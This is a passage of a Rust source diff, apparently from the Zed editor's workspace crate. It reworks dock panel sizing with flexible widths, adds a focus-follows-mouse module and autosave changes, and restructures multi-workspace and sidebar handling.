RESIZE_HANDLE_SIZE).abs(); - for panel in self.panel_entries.iter().map(|entry| &entry.panel) { - if panel.size(window, cx) > max_size { - panel.set_size(Some(max_size.max(RESIZE_HANDLE_SIZE)), window, cx); + for entry in &mut self.panel_entries { + let use_flexible = entry.panel.has_flexible_size(window, cx); + if use_flexible { + continue; + } + + let size = entry + .size_state + .size + .unwrap_or_else(|| entry.panel.default_size(window, cx)); + if size > max_size { + entry.size_state.size = Some(max_size.max(RESIZE_HANDLE_SIZE)); } } } + + pub(crate) fn load_persisted_size_state( + workspace: &Workspace, + panel_key: &'static str, + cx: &App, + ) -> Option { + let workspace_id = workspace + .database_id() + .map(|id| i64::from(id).to_string()) + .or(workspace.session_id())?; + 
let kvp = KeyValueStore::global(cx); + let scope = kvp.scoped(PANEL_SIZE_STATE_KEY); + scope + .read(&format!("{workspace_id}:{panel_key}")) + .log_err() + .flatten() + .and_then(|json| serde_json::from_str::(&json).log_err()) + } } impl Render for Dock { - fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let dispatch_context = Self::dispatch_context(); if let Some(entry) = self.visible_entry() { - let size = entry.panel.size(window, cx); - let position = self.position; let create_resize_handle = || { let handle = div() @@ -804,7 +1046,7 @@ impl Render for Dock { MouseButton::Left, cx.listener(|dock, e: &MouseUpEvent, window, cx| { if e.click_count == 2 { - dock.resize_active_panel(None, window, cx); + dock.resize_active_panel(None, None, window, cx); dock.workspace .update(cx, |workspace, cx| { workspace.serialize_workspace(window, cx); @@ -847,15 +1089,19 @@ impl Render for Dock { }; div() + .id("dock-panel") .key_context(dispatch_context) .track_focus(&self.focus_handle(cx)) + .focus_follows_mouse(self.focus_follows_mouse, cx) .flex() .bg(cx.theme().colors().panel_background) .border_color(cx.theme().colors().border) .overflow_hidden() .map(|this| match self.position().axis() { - Axis::Horizontal => this.w(size).h_full().flex_row(), - Axis::Vertical => this.h(size).w_full().flex_col(), + // Width and height are always set on the workspace wrapper in + // render_dock, so fill whatever space the wrapper provides. 
+ Axis::Horizontal => this.w_full().h_full().flex_row(), + Axis::Vertical => this.h_full().w_full().flex_col(), }) .map(|this| match self.position() { DockPosition::Left => this.border_r_1(), @@ -865,8 +1111,8 @@ impl Render for Dock { .child( div() .map(|this| match self.position().axis() { - Axis::Horizontal => this.min_w(size).h_full(), - Axis::Vertical => this.min_h(size).w_full(), + Axis::Horizontal => this.w_full().h_full(), + Axis::Vertical => this.h_full().w_full(), }) .child( entry @@ -880,6 +1126,7 @@ impl Render for Dock { }) } else { div() + .id("dock-panel") .key_context(dispatch_context) .track_focus(&self.focus_handle(cx)) } @@ -909,7 +1156,9 @@ impl Render for PanelButtons { DockPosition::Bottom | DockPosition::Right => (Corner::BottomRight, Corner::TopRight), }; - let buttons: Vec<_> = dock + let dock_entity = self.dock.clone(); + let workspace = dock.workspace.clone(); + let mut buttons: Vec<_> = dock .panel_entries .iter() .enumerate() @@ -924,6 +1173,10 @@ impl Render for PanelButtons { .log_err()?; let name = entry.panel.persistent_name(); let panel = entry.panel.clone(); + let supports_flexible = panel.supports_flexible_size(cx); + let currently_flexible = panel.has_flexible_size(window, cx); + let dock_for_menu = dock_entity.clone(); + let workspace_for_menu = workspace.clone(); let is_active_button = Some(i) == active_index && is_open; let (action, tooltip) = if is_active_button { @@ -940,6 +1193,7 @@ impl Render for PanelButtons { }; let focus_handle = dock.focus_handle(cx); + let icon_label = entry.panel.icon_label(window, cx); Some( right_click_menu(name) @@ -951,19 +1205,75 @@ impl Render for PanelButtons { ]; ContextMenu::build(window, cx, |mut menu, _, cx| { + let mut has_position_entries = false; for position in POSITIONS { - if position != dock_position - && panel.position_is_valid(position, cx) - { + if panel.position_is_valid(position, cx) { + let is_current = position == dock_position; let panel = panel.clone(); - menu = 
menu.entry( + menu = menu.toggleable_entry( format!("Dock {}", position.label()), + is_current, + IconPosition::Start, None, move |window, cx| { - panel.set_position(position, window, cx); + if !is_current { + panel.set_position(position, window, cx); + } }, - ) + ); + has_position_entries = true; + } + } + if supports_flexible { + if has_position_entries { + menu = menu.separator(); } + let panel_for_flex = panel.clone(); + let dock_for_flex = dock_for_menu.clone(); + let workspace_for_flex = workspace_for_menu.clone(); + menu = menu.toggleable_entry( + "Flex Width", + currently_flexible, + IconPosition::Start, + None, + move |window, cx| { + if !currently_flexible { + if let Some(ws) = workspace_for_flex.upgrade() { + ws.update(cx, |workspace, cx| { + workspace.toggle_dock_panel_flexible_size( + &dock_for_flex, + panel_for_flex.as_ref(), + window, + cx, + ); + }); + } + } + }, + ); + let panel_for_fixed = panel.clone(); + let dock_for_fixed = dock_for_menu.clone(); + let workspace_for_fixed = workspace_for_menu.clone(); + menu = menu.toggleable_entry( + "Fixed Width", + !currently_flexible, + IconPosition::Start, + None, + move |window, cx| { + if currently_flexible { + if let Some(ws) = workspace_for_fixed.upgrade() { + ws.update(cx, |workspace, cx| { + workspace.toggle_dock_panel_flexible_size( + &dock_for_fixed, + panel_for_fixed.as_ref(), + window, + cx, + ); + }); + } + } + }, + ); } menu }) @@ -973,7 +1283,7 @@ impl Render for PanelButtons { .trigger(move |is_active, _window, _cx| { // Include active state in element ID to invalidate the cached // tooltip when panel state changes (e.g., via keyboard shortcut) - IconButton::new((name, is_active_button as u64), icon) + let button = IconButton::new((name, is_active_button as u64), icon) .icon_size(IconSize::Small) .toggle_state(is_active_button) .on_click({ @@ -987,18 +1297,32 @@ impl Render for PanelButtons { this.tooltip(move |_window, cx| { Tooltip::for_action(tooltip.clone(), &*action, cx) }) - }) + }); + 
+ div().relative().child(button).when_some( + icon_label + .clone() + .filter(|_| !is_active_button) + .and_then(|label| label.parse::().ok()), + |this, count| this.child(CountBadge::new(count)), + ) }), ) }) .collect(); + if dock_position == DockPosition::Right { + buttons.reverse(); + } + let has_buttons = !buttons.is_empty(); h_flex() .gap_1() .when( - has_buttons && dock.position == DockPosition::Bottom, + has_buttons + && (dock.position == DockPosition::Bottom + || dock.position == DockPosition::Right), |this| this.child(Divider::vertical().color(DividerColor::Border)), ) .children(buttons) @@ -1029,7 +1353,8 @@ pub mod test { pub zoomed: bool, pub active: bool, pub focus_handle: FocusHandle, - pub size: Pixels, + pub default_size: Pixels, + pub flexible: bool, pub activation_priority: u32, } actions!(test_only, [ToggleTestPanel]); @@ -1043,10 +1368,22 @@ pub mod test { zoomed: false, active: false, focus_handle: cx.focus_handle(), - size: px(300.), + default_size: px(300.), + flexible: false, activation_priority, } } + + pub fn new_flexible( + position: DockPosition, + activation_priority: u32, + cx: &mut App, + ) -> Self { + Self { + flexible: true, + ..Self::new(position, activation_priority, cx) + } + } } impl Render for TestPanel { @@ -1077,12 +1414,32 @@ pub mod test { cx.update_global::(|_, _| {}); } - fn size(&self, _window: &Window, _: &App) -> Pixels { - self.size + fn default_size(&self, _window: &Window, _: &App) -> Pixels { + self.default_size + } + + fn initial_size_state(&self, _window: &Window, _: &App) -> PanelSizeState { + PanelSizeState { + size: None, + flex: None, + } + } + + fn supports_flexible_size(&self) -> bool { + self.flexible + } + + fn has_flexible_size(&self, _window: &Window, _: &App) -> bool { + self.flexible } - fn set_size(&mut self, size: Option, _window: &mut Window, _: &mut Context) { - self.size = size.unwrap_or(px(300.)); + fn set_flexible_size( + &mut self, + flexible: bool, + _window: &mut Window, + _cx: &mut Context, 
+ ) { + self.flexible = flexible; } fn icon(&self, _window: &Window, _: &App) -> Option { diff --git a/crates/workspace/src/focus_follows_mouse.rs b/crates/workspace/src/focus_follows_mouse.rs new file mode 100644 index 0000000000000000000000000000000000000000..da433cefcf059960181c190da83b06260651b063 --- /dev/null +++ b/crates/workspace/src/focus_follows_mouse.rs @@ -0,0 +1,71 @@ +use gpui::{ + AnyWindowHandle, AppContext as _, Context, FocusHandle, Focusable, Global, + StatefulInteractiveElement, Task, +}; + +use crate::workspace_settings; + +#[derive(Default)] +struct FfmState { + // The window and element to be focused + handles: Option<(AnyWindowHandle, FocusHandle)>, + // The debounced task which will do the focusing + _debounce_task: Option>, +} + +impl Global for FfmState {} + +pub trait FocusFollowsMouse: StatefulInteractiveElement { + fn focus_follows_mouse( + self, + settings: workspace_settings::FocusFollowsMouse, + cx: &Context, + ) -> Self { + if settings.enabled { + self.on_hover(cx.listener(move |this, enter, window, cx| { + if *enter { + let window_handle = window.window_handle(); + let focus_handle = this.focus_handle(cx); + + let state = cx.try_global::(); + + // Only replace the target if the new handle doesn't contain the existing one. + // This ensures that hovering over a parent (e.g., Dock) doesn't override + // a more specific child target (e.g., a Pane inside the Dock). 
+ let should_replace = state + .and_then(|s| s.handles.as_ref()) + .map(|(_, existing)| !focus_handle.contains(existing, window)) + .unwrap_or(true); + + if !should_replace { + return; + } + + let debounce_task = cx.spawn(async move |_this, cx| { + cx.background_executor().timer(settings.debounce).await; + + cx.update(|cx| { + let state = cx.default_global::(); + let Some((window, focus)) = state.handles.take() else { + return; + }; + + let _ = cx.update_window(window, move |_view, window, cx| { + window.focus(&focus, cx); + }); + }); + }); + + cx.set_global(FfmState { + handles: Some((window_handle, focus_handle)), + _debounce_task: Some(debounce_task), + }); + } + })) + } else { + self + } + } +} + +impl FocusFollowsMouse for T {} diff --git a/crates/workspace/src/history_manager.rs b/crates/workspace/src/history_manager.rs index 52f6be08b5972ab77a384aa8c0cf34fb29c2753c..9b03a3252d32793e12495817c2d9801d610d3ce4 100644 --- a/crates/workspace/src/history_manager.rs +++ b/crates/workspace/src/history_manager.rs @@ -7,7 +7,8 @@ use ui::{App, Context}; use util::{ResultExt, paths::PathExt}; use crate::{ - NewWindow, SerializedWorkspaceLocation, WORKSPACE_DB, WorkspaceId, path_list::PathList, + NewWindow, SerializedWorkspaceLocation, WorkspaceId, path_list::PathList, + persistence::WorkspaceDb, }; pub fn init(fs: Arc, cx: &mut App) { @@ -40,8 +41,9 @@ impl HistoryManager { } fn init(this: Entity, fs: Arc, cx: &App) { + let db = WorkspaceDb::global(cx); cx.spawn(async move |cx| { - let recent_folders = WORKSPACE_DB + let recent_folders = db .recent_workspaces_on_disk(fs.as_ref()) .await .unwrap_or_default() @@ -102,6 +104,7 @@ impl HistoryManager { .map(|entry| entry.path.clone()) .collect::>(); let user_removed = cx.update_jump_list(menus, entries); + let db = WorkspaceDb::global(cx); cx.spawn(async move |this, cx| { let user_removed = user_removed.await; if user_removed.is_empty() { @@ -119,7 +122,7 @@ impl HistoryManager { } }) { for id in deleted_ids.iter() { - 
WORKSPACE_DB.delete_workspace_by_id(*id).await.log_err(); + db.delete_workspace_by_id(*id).await.log_err(); } } }) diff --git a/crates/workspace/src/item.rs b/crates/workspace/src/item.rs index b29e02f05b367bab557403f3bb34f6ffa45caecc..64647419e300357e360e3ac3f535d8bbcd076711 100644 --- a/crates/workspace/src/item.rs +++ b/crates/workspace/src/item.rs @@ -9,13 +9,14 @@ use crate::{ }; use anyhow::Result; use client::{Client, proto}; -use futures::{StreamExt, channel::mpsc}; +use futures::channel::mpsc; use gpui::{ Action, AnyElement, AnyEntity, AnyView, App, AppContext, Context, Entity, EntityId, - EventEmitter, FocusHandle, Focusable, Font, HighlightStyle, Pixels, Point, Render, - SharedString, Task, WeakEntity, Window, + EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task, + WeakEntity, Window, }; use language::Capability; +pub use language::HighlightedText; use project::{Project, ProjectEntryId, ProjectPath}; pub use settings::{ ActivateOnClose, ClosePosition, RegisterSetting, Settings, SettingsLocation, ShowCloseButton, @@ -25,7 +26,6 @@ use smallvec::SmallVec; use std::{ any::{Any, TypeId}, cell::RefCell, - ops::Range, path::Path, rc::Rc, sync::Arc, @@ -124,14 +124,6 @@ pub enum ItemEvent { Edit, } -// TODO: Combine this with existing HighlightedText struct? -#[derive(Debug)] -pub struct BreadcrumbText { - pub text: String, - pub highlights: Option, HighlightStyle)>>, - pub font: Option, -} - #[derive(Clone, Copy, Default, Debug)] pub struct TabContentParams { pub detail: Option, @@ -329,7 +321,7 @@ pub trait Item: Focusable + EventEmitter + Render + Sized { ToolbarItemLocation::Hidden } - fn breadcrumbs(&self, _cx: &App) -> Option> { + fn breadcrumbs(&self, _cx: &App) -> Option<(Vec, Option)> { None } @@ -366,6 +358,18 @@ pub trait Item: Focusable + EventEmitter + Render + Sized { true } + /// Called when the containing pane receives a drop on the item or the item's tab. 
+ /// Returns `true` to consume it and suppress the pane's default drop behavior. + fn handle_drop( + &self, + _active_pane: &Pane, + _dropped: &dyn Any, + _window: &mut Window, + _cx: &mut App, + ) -> bool { + false + } + /// Returns additional actions to add to the tab's context menu. /// Each entry is a label and an action to dispatch. fn tab_extra_context_menu_actions( @@ -536,7 +540,7 @@ pub trait ItemHandle: 'static + Send { ) -> gpui::Subscription; fn to_searchable_item_handle(&self, cx: &App) -> Option>; fn breadcrumb_location(&self, cx: &App) -> ToolbarItemLocation; - fn breadcrumbs(&self, cx: &App) -> Option>; + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)>; fn breadcrumb_prefix(&self, window: &mut Window, cx: &mut App) -> Option; fn show_toolbar(&self, cx: &App) -> bool; fn pixel_position_of_cursor(&self, cx: &App) -> Option>; @@ -545,6 +549,13 @@ pub trait ItemHandle: 'static + Send { fn preserve_preview(&self, cx: &App) -> bool; fn include_in_nav_history(&self) -> bool; fn relay_action(&self, action: Box, window: &mut Window, cx: &mut App); + fn handle_drop( + &self, + active_pane: &Pane, + dropped: &dyn Any, + window: &mut Window, + cx: &mut App, + ) -> bool; fn tab_extra_context_menu_actions( &self, window: &mut Window, @@ -766,8 +777,8 @@ impl ItemHandle for Entity { send_follower_updates = Some(cx.spawn_in(window, { let pending_update = pending_update.clone(); async move |workspace, cx| { - while let Some(mut leader_id) = pending_update_rx.next().await { - while let Ok(Some(id)) = pending_update_rx.try_next() { + while let Ok(mut leader_id) = pending_update_rx.recv().await { + while let Ok(id) = pending_update_rx.try_recv() { leader_id = id; } @@ -925,25 +936,39 @@ impl ItemHandle for Entity { }, )); - cx.on_blur( + cx.on_focus_out( &self.read(cx).focus_handle(cx), window, - move |workspace, window, cx| { + move |workspace, _event, window, cx| { if let Some(item) = weak_item.upgrade() && item.workspace_settings(cx).autosave == 
AutosaveSetting::OnFocusChange { // Only trigger autosave if focus has truly left the item. // If focus is still within the item's hierarchy (e.g., moved to a context menu), // don't trigger autosave to avoid unwanted formatting and cursor jumps. - // Also skip autosave if focus moved to a modal (e.g., command palette), - // since the user is still interacting with the workspace. let focus_handle = item.item_focus_handle(cx); - if !focus_handle.contains_focused(window, cx) - && !workspace.has_active_modal(window, cx) - { - Pane::autosave_item(&item, workspace.project.clone(), window, cx) - .detach_and_log_err(cx); + if focus_handle.contains_focused(window, cx) { + return; } + + let vim_mode = vim_mode_setting::VimModeSetting::is_enabled(cx); + let helix_mode = vim_mode_setting::HelixModeSetting::is_enabled(cx); + + if vim_mode || helix_mode { + // We use the command palette for executing commands in Vim and Helix modes (e.g., `:w`), so + // in those cases we don't want to trigger auto-save if the focus has just been transferred + // to the command palette. + // + // This isn't totally perfect, as you could still switch files indirectly via the command + // palette (such as by opening up the tab switcher from it and then switching tabs that + // way). + if workspace.is_active_modal_command_palette(cx) { + return; + } + } + + Pane::autosave_item(&item, workspace.project.clone(), window, cx) + .detach_and_log_err(cx); } }, ) @@ -1071,7 +1096,7 @@ impl ItemHandle for Entity { self.read(cx).breadcrumb_location(cx) } - fn breadcrumbs(&self, cx: &App) -> Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { self.read(cx).breadcrumbs(cx) } @@ -1110,6 +1135,20 @@ impl ItemHandle for Entity { }) } + /// Called when the containing pane receives a drop on the item or the item's tab. + /// Returns `true` if the item handled it and the pane should skip its default drop behavior. 
+ fn handle_drop( + &self, + active_pane: &Pane, + dropped: &dyn Any, + window: &mut Window, + cx: &mut App, + ) -> bool { + self.update(cx, |this, cx| { + this.handle_drop(active_pane, dropped, window, cx) + }) + } + fn tab_extra_context_menu_actions( &self, window: &mut Window, @@ -1371,7 +1410,8 @@ pub mod test { }; use gpui::{ AnyElement, App, AppContext as _, Context, Entity, EntityId, EventEmitter, Focusable, - InteractiveElement, IntoElement, Render, SharedString, Task, WeakEntity, Window, + InteractiveElement, IntoElement, ParentElement, Render, SharedString, Task, WeakEntity, + Window, }; use project::{Project, ProjectEntryId, ProjectPath, WorktreeId}; use std::{any::Any, cell::Cell, sync::Arc}; @@ -1400,6 +1440,7 @@ pub mod test { pub tab_detail: Cell>, serialize: Option Option>>>>, focus_handle: gpui::FocusHandle, + pub child_focus_handles: Vec, } impl project::ProjectItem for TestProjectItem { @@ -1482,6 +1523,7 @@ pub mod test { workspace_id: Default::default(), focus_handle: cx.focus_handle(), serialize: None, + child_focus_handles: Vec::new(), } } @@ -1529,6 +1571,11 @@ pub mod test { self } + pub fn with_child_focus_handles(mut self, count: usize, cx: &mut Context) -> Self { + self.child_focus_handles = (0..count).map(|_| cx.focus_handle()).collect(); + self + } + pub fn set_state(&mut self, state: String, cx: &mut Context) { self.push_to_nav_history(cx); self.state = state; @@ -1536,14 +1583,19 @@ pub mod test { fn push_to_nav_history(&mut self, cx: &mut Context) { if let Some(history) = &mut self.nav_history { - history.push(Some(Box::new(self.state.clone())), cx); + history.push(Some(Box::new(self.state.clone())), None, cx); } } } impl Render for TestItem { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { - gpui::div().track_focus(&self.focus_handle(cx)) + let parent = gpui::div().track_focus(&self.focus_handle(cx)); + self.child_focus_handles + .iter() + .fold(parent, |parent, child_handle| { + 
parent.child(gpui::div().track_focus(child_handle)) + }) } } @@ -1641,23 +1693,30 @@ pub mod test { where Self: Sized, { - Task::ready(Some(cx.new(|cx| Self { - state: self.state.clone(), - label: self.label.clone(), - save_count: self.save_count, - save_as_count: self.save_as_count, - reload_count: self.reload_count, - is_dirty: self.is_dirty, - buffer_kind: self.buffer_kind, - has_conflict: self.has_conflict, - has_deleted_file: self.has_deleted_file, - project_items: self.project_items.clone(), - nav_history: None, - tab_descriptions: None, - tab_detail: Default::default(), - workspace_id: self.workspace_id, - focus_handle: cx.focus_handle(), - serialize: None, + Task::ready(Some(cx.new(|cx| { + Self { + state: self.state.clone(), + label: self.label.clone(), + save_count: self.save_count, + save_as_count: self.save_as_count, + reload_count: self.reload_count, + is_dirty: self.is_dirty, + buffer_kind: self.buffer_kind, + has_conflict: self.has_conflict, + has_deleted_file: self.has_deleted_file, + project_items: self.project_items.clone(), + nav_history: None, + tab_descriptions: None, + tab_detail: Default::default(), + workspace_id: self.workspace_id, + focus_handle: cx.focus_handle(), + serialize: None, + child_focus_handles: self + .child_focus_handles + .iter() + .map(|_| cx.focus_handle()) + .collect(), + } }))) } diff --git a/crates/workspace/src/modal_layer.rs b/crates/workspace/src/modal_layer.rs index 5949c0b1fffb216f27c939330954ecd8c7343a5c..cb6f21206fc5e1348224dd3e01e5155880e5d883 100644 --- a/crates/workspace/src/modal_layer.rs +++ b/crates/workspace/src/modal_layer.rs @@ -26,6 +26,15 @@ pub trait ModalView: ManagedView { fn render_bare(&self) -> bool { false } + + /// Returns whether this [`ModalView`] is the command palette. 
+ /// + /// This breaks the encapsulation of the [`ModalView`] trait a little bit, but there doesn't seem to be an + /// immediate, more elegant way to have the workspace know about the command palette (due to dependency arrow + /// directions). + fn is_command_palette(&self) -> bool { + false + } } trait ModalViewHandle { @@ -33,6 +42,7 @@ trait ModalViewHandle { fn view(&self) -> AnyView; fn fade_out_background(&self, cx: &mut App) -> bool; fn render_bare(&self, cx: &mut App) -> bool; + fn is_command_palette(&self, cx: &App) -> bool; } impl ModalViewHandle for Entity { @@ -51,6 +61,10 @@ impl ModalViewHandle for Entity { fn render_bare(&self, cx: &mut App) -> bool { self.read(cx).render_bare() } + + fn is_command_palette(&self, cx: &App) -> bool { + self.read(cx).is_command_palette() + } } pub struct ActiveModal { @@ -189,6 +203,13 @@ impl ModalLayer { pub fn has_active_modal(&self) -> bool { self.active_modal.is_some() } + + /// Returns whether the active modal is the command palette. 
+ pub fn is_active_modal_command_palette(&self, cx: &App) -> bool { + self.active_modal + .as_ref() + .map_or(false, |modal| modal.modal.is_command_palette(cx)) + } } impl Render for ModalLayer { diff --git a/crates/workspace/src/multi_workspace.rs b/crates/workspace/src/multi_workspace.rs index d58101f8b5c266fafa2120d8fe58634dc2414762..a61ad3576c57ecd8b1811363d6b5607ead737821 100644 --- a/crates/workspace/src/multi_workspace.rs +++ b/crates/workspace/src/multi_workspace.rs @@ -1,49 +1,132 @@ use anyhow::Result; use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt}; +use gpui::PathPromptOptions; use gpui::{ AnyView, App, Context, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, ManagedView, MouseButton, Pixels, Render, Subscription, Task, Tiling, Window, WindowId, actions, deferred, px, }; -use project::{DisableAiSettings, Project}; +use project::{DirectoryLister, DisableAiSettings, Project, ProjectGroupKey}; use settings::Settings; +pub use settings::SidebarSide; use std::future::Future; +use std::path::Path; use std::path::PathBuf; +use std::sync::Arc; use ui::prelude::*; use util::ResultExt; +use util::path_list::PathList; +use zed_actions::agents_sidebar::{MoveWorkspaceToNewWindow, ToggleThreadSwitcher}; + +use agent_settings::AgentSettings; +use settings::SidebarDockPosition; +use ui::{ContextMenu, right_click_menu}; const SIDEBAR_RESIZE_HANDLE_SIZE: Pixels = px(6.0); +use crate::AppState; use crate::{ - CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, Panel, Toast, - Workspace, WorkspaceId, client_side_decorations, notifications::NotificationId, + CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, OpenMode, + Panel, Workspace, WorkspaceId, client_side_decorations, + persistence::model::MultiWorkspaceState, }; actions!( multi_workspace, [ - /// Creates a new workspace within the current window. 
- NewWorkspaceInWindow, - /// Switches to the next workspace within the current window. - NextWorkspaceInWindow, - /// Switches to the previous workspace within the current window. - PreviousWorkspaceInWindow, /// Toggles the workspace switcher sidebar. ToggleWorkspaceSidebar, + /// Closes the workspace sidebar. + CloseWorkspaceSidebar, /// Moves focus to or from the workspace sidebar without closing it. FocusWorkspaceSidebar, + //TODO: Restore next/previous workspace ] ); +#[derive(Default)] +pub struct SidebarRenderState { + pub open: bool, + pub side: SidebarSide, +} + +pub fn sidebar_side_context_menu( + id: impl Into, + cx: &App, +) -> ui::RightClickMenu { + let current_position = AgentSettings::get_global(cx).sidebar_side; + right_click_menu(id).menu(move |window, cx| { + let fs = ::global(cx); + ContextMenu::build(window, cx, move |mut menu, _, _cx| { + let positions: [(SidebarDockPosition, &str); 2] = [ + (SidebarDockPosition::Left, "Left"), + (SidebarDockPosition::Right, "Right"), + ]; + for (position, label) in positions { + let fs = fs.clone(); + menu = menu.toggleable_entry( + label, + position == current_position, + IconPosition::Start, + None, + move |_window, cx| { + settings::update_settings_file(fs.clone(), cx, move |settings, _cx| { + settings + .agent + .get_or_insert_default() + .set_sidebar_side(position); + }); + }, + ); + } + menu + }) + }) +} + +pub enum MultiWorkspaceEvent { + ActiveWorkspaceChanged, + WorkspaceAdded(Entity), + WorkspaceRemoved(EntityId), +} + pub enum SidebarEvent { - Open, - Close, + SerializeNeeded, } -pub trait Sidebar: EventEmitter + Focusable + Render + Sized { +pub trait Sidebar: Focusable + Render + EventEmitter + Sized { fn width(&self, cx: &App) -> Pixels; fn set_width(&mut self, width: Option, cx: &mut Context); fn has_notifications(&self, cx: &App) -> bool; + fn side(&self, _cx: &App) -> SidebarSide; + + fn is_threads_list_view_active(&self) -> bool { + true + } + /// Makes focus reset back to the search editor 
upon toggling the sidebar from outside + fn prepare_for_focus(&mut self, _window: &mut Window, _cx: &mut Context) {} + /// Opens or cycles the thread switcher popup. + fn toggle_thread_switcher( + &mut self, + _select_last: bool, + _window: &mut Window, + _cx: &mut Context, + ) { + } + + /// Return an opaque JSON blob of sidebar-specific state to persist. + fn serialized_state(&self, _cx: &App) -> Option { + None + } + + /// Restore sidebar state from a previously-serialized blob. + fn restore_serialized_state( + &mut self, + _state: &str, + _window: &mut Window, + _cx: &mut Context, + ) { + } } pub trait SidebarHandle: 'static + Send + Sync { @@ -51,9 +134,17 @@ pub trait SidebarHandle: 'static + Send + Sync { fn set_width(&self, width: Option, cx: &mut App); fn focus_handle(&self, cx: &App) -> FocusHandle; fn focus(&self, window: &mut Window, cx: &mut App); + fn prepare_for_focus(&self, window: &mut Window, cx: &mut App); fn has_notifications(&self, cx: &App) -> bool; fn to_any(&self) -> AnyView; fn entity_id(&self) -> EntityId; + fn toggle_thread_switcher(&self, select_last: bool, window: &mut Window, cx: &mut App); + + fn is_threads_list_view_active(&self, cx: &App) -> bool; + + fn side(&self, cx: &App) -> SidebarSide; + fn serialized_state(&self, cx: &App) -> Option; + fn restore_serialized_state(&self, state: &str, window: &mut Window, cx: &mut App); } #[derive(Clone)] @@ -83,6 +174,10 @@ impl SidebarHandle for Entity { window.focus(&handle, cx); } + fn prepare_for_focus(&self, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| this.prepare_for_focus(window, cx)); + } + fn has_notifications(&self, cx: &App) -> bool { self.read(cx).has_notifications(cx) } @@ -94,52 +189,145 @@ impl SidebarHandle for Entity { fn entity_id(&self) -> EntityId { Entity::entity_id(self) } + + fn toggle_thread_switcher(&self, select_last: bool, window: &mut Window, cx: &mut App) { + let entity = self.clone(); + window.defer(cx, move |window, cx| { + entity.update(cx, 
|this, cx| { + this.toggle_thread_switcher(select_last, window, cx); + }); + }); + } + + fn is_threads_list_view_active(&self, cx: &App) -> bool { + self.read(cx).is_threads_list_view_active() + } + + fn side(&self, cx: &App) -> SidebarSide { + self.read(cx).side(cx) + } + + fn serialized_state(&self, cx: &App) -> Option { + self.read(cx).serialized_state(cx) + } + + fn restore_serialized_state(&self, state: &str, window: &mut Window, cx: &mut App) { + self.update(cx, |this, cx| { + this.restore_serialized_state(state, window, cx) + }) + } +} + +/// Tracks which workspace the user is currently looking at. +/// +/// `Persistent` workspaces live in the `workspaces` vec and are shown in the +/// sidebar. `Transient` workspaces exist outside the vec and are discarded +/// when the user switches away. +enum ActiveWorkspace { + /// A persistent workspace, identified by index into the `workspaces` vec. + Persistent(usize), + /// A workspace not in the `workspaces` vec that will be discarded on + /// switch or promoted to persistent when the sidebar is opened. + Transient(Entity), +} + +impl ActiveWorkspace { + fn persistent_index(&self) -> Option { + match self { + Self::Persistent(index) => Some(*index), + Self::Transient(_) => None, + } + } + + fn transient_workspace(&self) -> Option<&Entity> { + match self { + Self::Transient(workspace) => Some(workspace), + Self::Persistent(_) => None, + } + } + + /// Sets the active workspace to transient, returning the previous + /// transient workspace (if any). + fn set_transient(&mut self, workspace: Entity) -> Option> { + match std::mem::replace(self, Self::Transient(workspace)) { + Self::Transient(old) => Some(old), + Self::Persistent(_) => None, + } + } + + /// Sets the active workspace to persistent at the given index, + /// returning the previous transient workspace (if any). 
+ fn set_persistent(&mut self, index: usize) -> Option> { + match std::mem::replace(self, Self::Persistent(index)) { + Self::Transient(workspace) => Some(workspace), + Self::Persistent(_) => None, + } + } } pub struct MultiWorkspace { window_id: WindowId, workspaces: Vec>, - active_workspace_index: usize, + active_workspace: ActiveWorkspace, + project_group_keys: Vec, sidebar: Option>, sidebar_open: bool, - _sidebar_subscription: Option, + sidebar_overlay: Option, pending_removal_tasks: Vec>, _serialize_task: Option>, - _create_task: Option>, _subscriptions: Vec, } +impl EventEmitter for MultiWorkspace {} + impl MultiWorkspace { + pub fn sidebar_side(&self, cx: &App) -> SidebarSide { + self.sidebar + .as_ref() + .map_or(SidebarSide::Left, |s| s.side(cx)) + } + + pub fn sidebar_render_state(&self, cx: &App) -> SidebarRenderState { + SidebarRenderState { + open: self.sidebar_open() && self.multi_workspace_enabled(cx), + side: self.sidebar_side(cx), + } + } + pub fn new(workspace: Entity, window: &mut Window, cx: &mut Context) -> Self { let release_subscription = cx.on_release(|this: &mut MultiWorkspace, _cx| { if let Some(task) = this._serialize_task.take() { task.detach(); } - if let Some(task) = this._create_task.take() { - task.detach(); - } for task in std::mem::take(&mut this.pending_removal_tasks) { task.detach(); } }); let quit_subscription = cx.on_app_quit(Self::app_will_quit); - let settings_subscription = - cx.observe_global_in::(window, |this, window, cx| { - if DisableAiSettings::get_global(cx).disable_ai && this.sidebar_open { - this.close_sidebar(window, cx); + let settings_subscription = cx.observe_global_in::(window, { + let mut previous_disable_ai = DisableAiSettings::get_global(cx).disable_ai; + move |this, window, cx| { + if DisableAiSettings::get_global(cx).disable_ai != previous_disable_ai { + this.collapse_to_single_workspace(window, cx); + previous_disable_ai = DisableAiSettings::get_global(cx).disable_ai; } - }); - 
Self::subscribe_to_workspace(&workspace, cx); + } + }); + Self::subscribe_to_workspace(&workspace, window, cx); + let weak_self = cx.weak_entity(); + workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); Self { window_id: window.window_handle().window_id(), - workspaces: vec![workspace], - active_workspace_index: 0, + project_group_keys: Vec::new(), + workspaces: Vec::new(), + active_workspace: ActiveWorkspace::Transient(workspace), sidebar: None, sidebar_open: false, - _sidebar_subscription: None, + sidebar_overlay: None, pending_removal_tasks: Vec::new(), _serialize_task: None, - _create_task: None, _subscriptions: vec![ release_subscription, quit_subscription, @@ -148,29 +336,31 @@ impl MultiWorkspace { } } - pub fn register_sidebar( - &mut self, - sidebar: Entity, - window: &mut Window, - cx: &mut Context, - ) { - let subscription = - cx.subscribe_in(&sidebar, window, |this, _, event, window, cx| match event { - SidebarEvent::Open => this.toggle_sidebar(window, cx), - SidebarEvent::Close => { - this.close_sidebar(window, 